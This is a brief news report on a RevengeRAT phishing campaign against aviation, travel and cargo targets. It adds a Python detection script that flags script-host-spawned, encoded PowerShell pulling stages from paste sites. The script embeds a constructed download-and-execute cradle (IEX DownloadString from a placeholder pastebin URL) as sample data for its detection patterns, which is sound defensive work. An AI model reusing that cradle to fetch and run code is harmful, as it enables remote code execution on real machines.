New RevengeRat Malware steals passwords, browser data


“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said. 

Once the RATs are active, they connect directly to a command and control (C2) server and then download more malware from paste sites such as pastebin.com. 

“The RATs connect to a C2 server hosted on a dynamic hosting site to register with the attackers, and then use a UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites,” reports Microsoft Security Intelligence. 
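An added example, not from the article or from Microsoft's report: a small Python triage script that flags process-creation records matching the chain described above (a script host spawning PowerShell, an encoded command, a download cradle, a paste-site URL). The record field names, the sample command lines and the pastebin URL path are constructed placeholders, not real telemetry or indicators from the campaign.

```python
import base64
import re

# Constructed stage-two command line modelled on the described chain
# (VBScript dropper -> PowerShell -> paste site). The URL path is a placeholder.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
ENC_UTF16 = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()  # what PowerShell expects
ENC_UTF8 = base64.b64encode(PAYLOAD.encode("utf-8")).decode()      # variant noted in the report

# Constructed process-creation records; the field names are an assumed schema.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -EncodedCommand " + ENC_UTF16},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -enc " + ENC_UTF8},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # the VBScript dropper stage
PASTE_HOSTS = ("pastebin.com",)                  # named in the report; extend as needed
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I)
ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell expects UTF-16LE, but the report mentions UTF-8-encoded stages, so both are handled."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    # ASCII text in UTF-16LE has a zero byte in every odd position.
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")

def flag_event(event):
    """Return the reasons this record resembles the RAT delivery chain (empty list if none)."""
    reasons = []
    text = event["cmd"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded-command")
        text = text + " " + decoded          # inspect the decoded stage as well
    if event["parent"].lower() in SCRIPT_HOSTS and event["image"].lower() == "powershell.exe":
        reasons.append("script-host-spawned-powershell")
    if CRADLE_RE.search(text):
        reasons.append("download-cradle")
    if any(host in text.lower() for host in PASTE_HOSTS):
        reasons.append("paste-site")
    return reasons

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", ev["image"], flag_event(ev) or "clean")
```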

Sophisticated Phishing

Roger Grimes, tech evangelist at KnowBe4, comments that the RevengeRAT campaign shows a new development in malware gang activity: instead of the usual financial and government targets, the attackers specialize in specific vertical sectors, use precise lures in their phishing emails, and tailor the campaigns to a more directed attack.